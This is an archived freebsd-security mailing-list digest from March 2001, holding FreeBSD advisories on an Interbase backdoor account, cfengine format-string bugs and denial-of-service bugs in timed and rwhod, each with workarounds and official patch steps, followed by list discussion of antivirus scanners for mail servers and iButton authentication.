X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:26.interbase
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
-----BEGIN PGP SIGNED MESSAGE-----
=============================================================================
FreeBSD-SA-01:26 Security Advisory
FreeBSD, Inc.
Topic: interbase contains remote backdoor
Category: ports
Module: interbase
Announced: 2001-03-12
Credits: Firebird project <http://firebird.sourceforge.net>
Affects: Ports collection prior to the correction date.
Corrected: See below.
Vendor status: No update released
FreeBSD only: NO
I. Background
Interbase is a SQL database server from Borland.
II. Problem Description
The interbase software contains a remote backdoor account, which was
apparently introduced by the vendor in 1992. The interbase source
code has recently been released and is the basis for a derivative
project called firebird, who are credited with discovering the
vulnerability.
The backdoor account has full read and write access to databases
stored on the server, and also gives the ability to write to arbitrary
files on the server as the user running the interbase server (usually
user root). Remote attackers may connect to the database on TCP port
3050.
The interbase port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains nearly 4700 third-party applications in a ready-to-install
format. The ports collections shipped with FreeBSD 3.5.1 and 4.2
contain this problem since it was discovered after the releases.
FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.
III. Impact
Remote users who can connect to the interbase database server can
obtain full access to all databases using a backdoor account built
into the server itself. This account cannot be disabled.
If you have not chosen to install the interbase port/package, then
your system is not vulnerable to this problem.
IV. Workaround
1) Deinstall the interbase port/package, if you have installed it.
2) Use packet filters on your perimeter firewalls, or ipfw(8)/ipf(8)
on the interbase server to prevent connections from untrusted systems
to TCP port 3050 on the interbase server. Note that local users, or
arbitrary users on systems permitted to connect to the TCP port can
still access the backdoor account.
3) Migrate to the firebird database, which is an open-source
derivative of the interbase software which does not contain the
backdoor account.
V. Solution
The FreeBSD port of interbase is not provided by Borland -- it is
provided in binary form from Rios Corporation -- and there does not
appear to be a patch available for the security vulnerability.
Therefore there is currently no complete solution to this security
vulnerability; see the previous section for possible workarounds.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iQCVAwUBOq1c21UuHi5z0oilAQEfhgP/aoWhV5eBmmKkYcpVxRhu+FkkOYJvIwih
RIsCmTKISP5f0smt37Qw4B0o5F2EmAUVncYFNGK39Co+Pxr9eyRx0PD4HvX8JnZ3
7QtqRE4Oh2LwX0xpd9tpUpT1yxdGX9u+TSB+9MdB5hIyEsnRjwuMwZn1vUOBB8uk
whVMpvQLc/w=
=C9Nl
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 15:38: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
by hub.freebsd.org (Postfix) with ESMTP
id A92F337B71A; Mon, 12 Mar 2001 15:37:52 -0800 (PST)
(envelope-from security-advisories@FreeBSD.org)
Received: (from kris@localhost)
by freefall.freebsd.org (8.11.1/8.11.1) id f2CNbqc26863;
Mon, 12 Mar 2001 15:37:52 -0800 (PST)
(envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:37:52 -0800 (PST)
Message-Id: <200103122337.f2CNbqc26863@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:27.cfengine
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
-----BEGIN PGP SIGNED MESSAGE-----
=============================================================================
FreeBSD-SA-01:27 Security Advisory
FreeBSD, Inc.
Topic: cfengine port contains remote root vulnerability
Category: ports
Module: cfengine
Announced: 2001-03-12
Credits: Pekka Savola <pekkas@NETCORE.FI>
Affects: Ports collection prior to the correction date.
Corrected: 2001-01-21
Vendor status: Updated version released
FreeBSD only: NO
I. Background
cfengine is a system for automating the configuration and maintenance
of large networks.
II. Problem Description
The cfengine port, versions prior to 1.6.1, contained several format
string vulnerabilities which allow a remote attacker to execute
arbitrary code on the local system as the user running cfengine,
usually user root.
The cfengine port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains nearly 4700 third-party applications in a ready-to-install
format. The ports collections shipped with FreeBSD 3.5.1 and 4.2
contain this problem since it was discovered after the releases.
FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.
III. Impact
Arbitrary remote users can execute code on the local system as the
user running cfengine, usually user root.
If you have not chosen to install the cfengine port/package, then your
system is not vulnerable to this problem.
IV. Workaround
One of the following:
1) Deinstall the cfengine port/package, if you have installed it.
2) Implement access controls on connections to the cfengine server,
either at the application level using the cfengine configuration file,
or by using network-level packet filtering on the local system using
ipfw(8)/ipf(8), or on the perimeter firewalls.
V. Solution
One of the following:
1) Upgrade your entire ports collection and rebuild the cfengine port.
2) Deinstall the old package and install a new package dated after the
correction date, obtained from:
[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/sysutils/cfengine-1.6.3.tar.gz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/sysutils/cfengine-1.6.3.tar.gz
[alpha]
Packages are not automatically generated for the alpha architecture at
this time due to lack of build resources.
3) download a new port skeleton for the cfengine port from:
http://www.freebsd.org/ports/
and use it to rebuild the port.
4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iQCVAwUBOq1dclUuHi5z0oilAQFhhAQApfRMj88GYMKiTtLeyjWeaDLFIlDjUTl4
fF1QQNzetOSIoVjA+CsbkTgsX/c8B6Lc7BuTI7K3BLKUu2QC2GbYkn5/ymCdYQeE
dW2S00bMdBP6GwURAdFnizezkZq5Y3oEVYXVL4s91M9jb3wCwNOwnbfKH/aegFvL
ZOjDvMUdjb0=
=yzjS
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 15:44:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
by hub.freebsd.org (Postfix) with ESMTP
id DE4F637B719; Mon, 12 Mar 2001 15:44:00 -0800 (PST)
(envelope-from security-advisories@FreeBSD.org)
Received: (from kris@localhost)
by freefall.freebsd.org (8.11.1/8.11.1) id f2CNi0R27619;
Mon, 12 Mar 2001 15:44:00 -0800 (PST)
(envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:44:00 -0800 (PST)
Message-Id: <200103122344.f2CNi0R27619@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Subject: FreeBSD Security Advisory FreeBSD-SA-01:28.timed
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
-----BEGIN PGP SIGNED MESSAGE-----
=============================================================================
FreeBSD-SA-01:28 Security Advisory
FreeBSD, Inc.
Topic: timed allows remote denial of service
Category: core
Module: timed
Announced: 2001-03-12
Credits: Discovered during internal source code auditing
Affects: All released versions of FreeBSD 3.x, 4.x.
FreeBSD 3.5-STABLE prior to the correction date.
FreeBSD 4.2-STABLE prior to the correction date.
Corrected: 2001-03-10 (FreeBSD 3.5-STABLE)
2001-01-07 (FreeBSD 4.2-STABLE)
FreeBSD only: NO
I. Background
timed(8) is a server for the Time Synchronisation Protocol, for
synchronising the system clocks of multiple clients.
II. Problem Description
Malformed packets sent to the timed daemon could cause it to crash,
thereby denying service to clients if timed is not run under a
watchdog process which causes it to automatically restart in the event
of a failure. The timed daemon is not run in this way in the default
invocation from /etc/rc.conf using the timed_enable variable.
The timed daemon is not enabled by default, and its use is not
recommended (FreeBSD includes ntpd(8), the network time protocol
daemon, which provides superior functionality).
All versions of FreeBSD 3.x and 4.x prior to the correction date
including 3.5.1-RELEASE and 4.2-RELEASE are vulnerable to this
problem, if they have been configued to run timed. It was corrected
prior to the forthcoming release of FreeBSD 4.3.
III. Impact
Remote users can cause the timed daemon to crash, denying service to
clients.
IV. Workaround
Implement packet filtering at perimeter firewalls or on the local
machine using ipfw(8)/ipf(8) to prevent untrusted users from
connecting to the timed service. The timed daemon listens on UDP port
525 by default.
V. Solution
Upgrade your vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE
after the respective correction dates.
To patch your present system: download the relevant patch from the
below location, and execute the following commands as root:
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:28/timed.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:28/timed.patch.asc
This patch has been verified to apply to FreeBSD 4.2-RELEASE and
FreeBSD 3.5.1-RELEASE. It may or may not apply to older releases.
Verify the detached PGP signature using your PGP utility.
# cd /usr/src/usr.sbin/timed/timed
# patch -p < /path/to/patch
# make depend && make all install
Kill and restart timed to cause the changes to take effect. If you
have started timed with non-standard options (e.g. by setting
timed_flags in /etc/rc.conf) then the below command will need to be
modified appropriately.
# killall -KILL timed
# /usr/sbin/timed
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iQCVAwUBOq1emVUuHi5z0oilAQEYEwP/cPNMQO7LjlEs2/MyxJwVKpQLRzmprJjQ
i2QpXEvkZgXSxAcIh15jNsR1TPwUnzCRWHZ5touw0DxTbTbMsnzRVx0/P5jGmQCT
6n5Z11puyEg336zET+tGhVnEt9Ybm7Z/h7Et+njVRTVqbe2AtpFeSbI5NXlZCgs6
ZUYxdLUhfPM=
=Dw88
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 15:48:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
by hub.freebsd.org (Postfix) with ESMTP
id 2EFDA37B718; Mon, 12 Mar 2001 15:47:59 -0800 (PST)
(envelope-from security-advisories@FreeBSD.org)
Received: (from kris@localhost)
by freefall.freebsd.org (8.11.1/8.11.1) id f2CNlxe28107;
Mon, 12 Mar 2001 15:47:59 -0800 (PST)
(envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:47:59 -0800 (PST)
Message-Id: <200103122347.f2CNlxe28107@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Subject: FreeBSD Security Advisory FreeBSD-SA-01:29.rwhod
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
-----BEGIN PGP SIGNED MESSAGE-----
=============================================================================
FreeBSD-SA-01:29 Security Advisory
FreeBSD, Inc.
Topic: rwhod allows remote denial of service
Category: core
Module: rwhod
Announced: 2001-03-12
Credits: Mark Huizer <xaa@xaa.iae.nl>
Affects: All released versions of FreeBSD 3.x, 4.x.
FreeBSD 3.5-STABLE prior to the correction date.
FreeBSD 4.2-STABLE prior to the correction date.
Corrected: 2000-12-23 (FreeBSD 3.5-STABLE)
2000-12-22 (FreeBSD 4.2-STABLE)
FreeBSD only: NO
I. Background
rwhod(8) is a server which implements the rwho protocol, which
communicates information on system uptime and logged-in users between
machines on a network.
II. Problem Description
Malformed packets sent to the rwhod daemon could cause it to crash,
thereby denying service to clients if rwhod is not run under a
watchdog process which causes it to automatically restart in the event
of a failure. The rwhod daemon is not run in this way in the default
invocation from /etc/rc.conf using the rwhod_enable variable.
All versions of FreeBSD 3.x and 4.x prior to the correction date
including 3.5.1-RELEASE and 4.2-RELEASE are vulnerable to this
problem, if they have been configued to run rwhod (this is not enabled
by default).
III. Impact
Remote users can cause the rwhod daemon to crash, denying service to
clients.
IV. Workaround
Implement packet filtering at perimeter firewalls or on the local
machine using ipfw(8)/ipf(8) to prevent untrusted users from
connecting to the rwhod service. The rwhod daemon listens on UDP port
513 by default.
V. Solution
Upgrade your vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE
after the respective correction dates.
To patch your present system: download the relevant patch from the
below location, and execute the following commands as root:
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:29/rwhod.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:29/rwhod.patch.asc
This patch has been verified to apply to FreeBSD 4.2-RELEASE and
FreeBSD 3.5.1-RELEASE. It may or may not apply to older releases.
Verify the detached PGP signature using your PGP utility.
# cd /usr/src/usr.sbin/rwhod
# patch -p < /path/to/patch
# make depend && make all install
Kill and restart rwhod to cause the changes to take effect. If you
have started rwhod with non-standard options (e.g. by setting
rwhod_flags in /etc/rc.conf) then the below command will need to be
modified appropriately.
# killall -KILL rwhod
# /usr/sbin/rwhod
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iQCVAwUBOq1fmlUuHi5z0oilAQG05QP/bQpUXpXc+X3/k/jbqgxjNOXwfzYRwNph
trCjRBKDKZrBGvlS2mTSbyisn6Rcv5PhigVAmU7sllrrXmYDCuMjNoMQqIhRwMax
ojaklsg6F8rX3zNwUlaQp45ZYiJ9Zi34kkRRnZQ5oAFciS6I/3tYnP9t0Sedbbsi
V/na+hI/Gtk=
=TskQ
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 19: 5:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2])
by hub.freebsd.org (Postfix) with ESMTP id 2096837B71A
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 19:05:14 -0800 (PST)
(envelope-from jwyatt@rwsystems.net)
Received: from bsdie.rwsystems.net([209.197.223.2]) (1999 bytes) by bsdie.rwsystems.net
via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp
(sender: <jwyatt@rwsystems.net>)
id <m14cf6R-000CCSC@bsdie.rwsystems.net>
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 21:04:03 -0600 (CST)
(Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25)
Date: Mon, 12 Mar 2001 21:04:02 -0600 (CST)
From: James Wyatt <jwyatt@rwsystems.net>
To: Will Mitayai Keeso Rowe <mit@mitayai.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
Message-ID: <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.BSF.4.10.10103122000482.72725@bsdie.rwsystems.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I have an eval copy of a product that looks promising: Sohpos antivirus.
http://www.sophos.com/products/antivirus/savunix.html
You can use the SAVI (API for virus checking) to scan email according to
the description at:
http://www.sophos.com/products/antivirus/savi/
Their licensing looks fair and the sales person assigned to me has been
politely helpful and not overly insistant. Everything I've looked at so
far looks great, but the customer that wanted it has had delays and now
wants to wait for FreeBSD 4.3-RELEASE to install things on their server.
Updates are monthly CDs and urgent updates are available as downloads.
Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
scan the Samba partitions for file infections. It handles uSoft Office
products like Word(tm) docs and such.
Best of all, they support FreeBSD so we should support them, right? - Jy@
On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:
> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don;t trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.
>
> Regards,
> Mit
>
> --
> Will Mitayai Keeso Rowe
>
> For full contact information, please visit:
> http://my.infotriever.com/mitayai
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 20:34:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19])
by hub.freebsd.org (Postfix) with ESMTP id 0B67A37B71C
for <freebsd-security@FreeBSD.ORG>; Mon, 12 Mar 2001 20:34:36 -0800 (PST)
(envelope-from durham@w2xo.pgh.pa.us)
Received: from shazam (shazam [192.168.5.3])
by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2D4XOq36759;
Tue, 13 Mar 2001 04:33:24 GMT
(envelope-from durham@w2xo.pgh.pa.us)
Date: Mon, 12 Mar 2001 23:35:38 -0500 (EST)
From: Jim Durham <durham@w2xo.pgh.pa.us>
X-Sender: durham@shazam.int
To: James Wyatt <jwyatt@rwsystems.net>
Cc: Will Mitayai Keeso Rowe <mit@mitayai.net>,
freebsd-security@FreeBSD.ORG
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>
Message-ID: <Pine.BSF.4.21.0103122322250.25997-100000@shazam.int>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Mon, 12 Mar 2001, James Wyatt wrote:
> I have an eval copy of a product that looks promising: Sohpos antivirus.
>
> http://www.sophos.com/products/antivirus/savunix.html
>
> You can use the SAVI (API for virus checking) to scan email according to
> the description at:
>
> http://www.sophos.com/products/antivirus/savi/
>
> Their licensing looks fair and the sales person assigned to me has been
> politely helpful and not overly insistant. Everything I've looked at so
> far looks great, but the customer that wanted it has had delays and now
> wants to wait for FreeBSD 4.3-RELEASE to install things on their server.
>
> Updates are monthly CDs and urgent updates are available as downloads.
>
> Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
> scan the Samba partitions for file infections. It handles uSoft Office
> products like Word(tm) docs and such.
>
> Best of all, they support FreeBSD so we should support them, right? - Jy@
>
> On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:
> > Is anyone aware of any virus scanning solutions for freebsd, particularly
> > solutions for email? I don;t trust my users not to follow proper email
> > guidelines, and thus would like to stop email at the server before they get
> > delivered the message.
> >
I am using Sophos, and Amavis at our company. It is working very well.
Sophos supports Windoze, Mac, Linux, FreeBSD, even VMS and OS2!
You have Sendmail call Amavis for all incoming mail. Amavis unpacks
and scans all attachments, even zipped and rar'ed and so forth, then
delivers the mail to the user's mailbox if it's OK. Otherwise, it
mails either the originator of the virus mail and/or the administrator
and saves the virus mail for perusal. Works very well, but you need
a little horsepower on the server. Our company sends around huge
Autocad drawings and Excel spreadsheets and they all have to be
"unattached" and scanned.
I'm also using the Sophos Intercheck daemon. You put the Sophos CD
in any workstation on your LAN, pick a directory on the server in
which to install the Sophos setup stuff and Intercheck stuff. Then
you install all the workstations (including the one you used to generate
the server setup directory) from the server (running SAMBA of course!).
Now, when a user logs into the M$ domain on Samba, any updates will
be automatically downloaded to the workstation. I update several times
daily from the Sophos site. When Sophos is first run on the workstation,
it builds a file list. Any time the list is modified, it refers it
to the intercheck daemon on the server for virus sweeping. Of course,
any e-mail attachment that was unpacked would be scanned immediately,
as it wouldn't be on the "safe" list.
Works well..
Jim Durham
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 21: 5:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp011.mail.yahoo.com (smtp011.mail.yahoo.com [216.136.173.31])
by hub.freebsd.org (Postfix) with SMTP id 2BCF337B719
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 21:05:32 -0800 (PST)
(envelope-from neve_ripe@yahoo.com)
Received: from f2f.tsua.net (HELO never) (212.40.34.58)
by smtp.mail.vip.sc5.yahoo.com with SMTP; 13 Mar 2001 05:05:31 -0000
X-Apparently-From: <neve?ripe@yahoo.com>
Date: Tue, 13 Mar 2001 07:05:24 +0200
From: Alexandr Kovalenko <neve_ripe@yahoo.com>
X-Mailer: The Bat! (v1.49) UNREG / CD5BF9353B3B7091
Reply-To: Alexandr Kovalenko <neve_ripe@yahoo.com>
Organization: UIC Group
X-Priority: 3 (Normal)
Message-ID: <060144903.20010313070524@yahoo.com>
To: "Will Mitayai Keeso Rowe" <mit@mitayai.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
In-reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
References: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Hello Will,
Monday, March 12, 2001, 11:56:43 PM, you wrote:
WMKR> Is anyone aware of any virus scanning solutions for freebsd, particularly
WMKR> solutions for email? I don;t trust my users not to follow proper email
WMKR> guidelines, and thus would like to stop email at the server before they get
WMKR> delivered the message.
There is antivirus software calles AVP, it has versions for FreeBSD
4.x and 3.x. It has good virus base (for now ~45000). It can be
itercorporated with sendmail too.
See http://www.kaspersky.com/ for details.
--
Best regards,
Alexandr mailto:neve_ripe@yahoo.com
_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 21:33:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gull.prod.itd.earthlink.net (gull.prod.itd.earthlink.net [207.217.121.85])
by hub.freebsd.org (Postfix) with ESMTP id B5B1F37B718
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 21:33:30 -0800 (PST)
(envelope-from dhagan@colltech.com)
Received: from colltech.com (1Cust6.tnt4.clarksburg.wv.da.uu.net [63.15.39.6])
by gull.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with ESMTP id VAA13553
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 21:33:29 -0800 (PST)
Message-ID: <3AADB1D3.C70E00C@colltech.com>
Date: Tue, 13 Mar 2001 00:36:19 -0500
From: Daniel Hagan <dhagan@colltech.com>
X-Mailer: Mozilla 4.73 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: iButton Development
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
There was some discussion regarding iButtons in mid-Jan on this list.
I'm interested in getting one or more of these things to play with, with
the goal of:
o Authenticating myself to my home workstations (pam module?).
o Storing PGP & ssh keys.
Since I assume these are tasks of interest to more people than just
myself, I was wondering:
o Does anyone have existing code bases to support these tasks?
o Is there any support (in the political sense) for getting the pam
module and/or other code incorporated into the base system or as a port?
o Does anyone have any recommendations on what hardware to procure for
these tasks? I was looking at getting a serial port BlueDot (possibly
two or three, I have some laptops I may want to use this with too) and a
DS1996L-F5 64-kbit Memory iButton. I would also think about getting a
Java-powered iButton, Model 96, Release 1.1 (or 2.2) if I understood
exactly what I'd be getting for the money. Does anyone have any
information/examples on how these Java iButtons are used?
Thanks,
Daniel
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 22:34:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from server.mbg.com.ge (server.mbg.com.ge [212.72.131.237])
by hub.freebsd.org (Postfix) with SMTP id 8DB5C37B718
for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 22:34:03 -0800 (PST)
(envelope-from nugzar@mbg.com.ge)
Received: (qmail 10694 invoked from network); 13 Mar 2001 06:59:30 -0000
Received: from unknown (HELO nugzar) (192.168.170.152)
by server.mbg.com.ge with SMTP; 13 Mar 2001 06:59:30 -0000
Date: Tue, 13 Mar 2001 10:34:00 +0400
From: Nugzar Nebieridze <nugzar@mbg.com.ge>
X-Mailer: The Bat! (v1.44) UNREG / CD5BF9353B3B7091
Reply-To: Nugzar Nebieridze <nugzar@mbg.com.ge>
X-Priority: 3 (Normal)
Message-ID: <1363890484.20010313103400@mbg.com.ge>
To: freebsd-security@freebsd.org
Subject: Re[2]: Virus Scanning Software for FreeBSD
In-reply-To: <060144903.20010313070524@yahoo.com>
References: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
<060144903.20010313070524@yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Hello Alexandr,
Tuesday, March 13, 2001, 9:05:24 AM, you wrote:
AK> Hello Will,
AK> Monday, March 12, 2001, 11:56:43 PM, you wrote:
WMKR>> Is anyone aware of any virus scanning solutions for freebsd, particularly
WMKR>> solutions for email? I don;t trust my users not to follow proper email
WMKR>> guidelines, and thus would like to stop email at the server before they get
WMKR>> delivered the message.
AK> There is antivirus software calles AVP, it has versions for FreeBSD
AK> 4.x and 3.x. It has good virus base (for now ~45000). It can be
AK> itercorporated with sendmail too.
AK> See http://www.kaspersky.com/ for details.
This company provides AntiVirus software for Windows, FreeBSD and
Linux. If you server is heavily loaded then they are also providing a
daemon AVP that loads its databases only once when you start it and
then you can connect to its socket and pass data to check on viruses.
It requires less computer resources. It is not free, but you can
download demo version that will be able to detect viruses only but not
disinfect them...
Hope it helps.
Nugzar
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 22:52:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179])
by hub.freebsd.org (Postfix) with ESMTP id BC4CF37B750
for <freebsd-security@FreeBSD.ORG>; Mon, 12 Mar 2001 22:52:13 -0800 (PST)
(envelope-from meshko@daedalus.cs.brandeis.edu)
Received: from localhost (meshko@localhost)
by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id BAA04636;
Tue, 13 Mar 2001 01:51:57 -0500
Date: Tue, 13 Mar 2001 01:51:57 -0500 (EST)
From: Mikhail Kruk <meshko@cs.brandeis.edu>
To: Nugzar Nebieridze <nugzar@mbg.com.ge>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Re[2]: Virus Scanning Software for FreeBSD
In-Reply-To: <1363890484.20010313103400@mbg.com.ge>
Message-ID: <Pine.LNX.4.30.0103130149050.4508-100000@daedalus.cs.brandeis.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> AK> See http://www.kaspersky.com/ for details.
...off-topic...
but I remember the first antivirus made by this guy, Kaspersky... if I'm
not mistaken, it was a MS DOS TSR program written in Pascal which
monitored interrup handlers, writes to MBR etc...
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Mar 12 23: 4:54 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15])
by hub.freebsd.org (Postfix) with ESMTP
id 33F7C37B718; Mon, 12 Mar 2001 23:04:48 -0800 (PST)
(envelope-from tedm@toybox.placo.com)
Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154])
by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2D723N18585;
Mon, 12 Mar 2001 23:02:03 -0800 (PST)
(envelope-from tedm@toybox.placo.com)
From: "Ted Mittelstaedt" <tedm@toybox.placo.com>
To: "Bob Van Valzah" <Bob@Talarian.Com>,
"pW" <packetwhore@stargate.net>
Cc: <FreeBSD-Security@FreeBSD.ORG>, <FreeBSD-Questions@FreeBSD.ORG>
Subject: RE: Racoon Problem & Cisco Tunnel
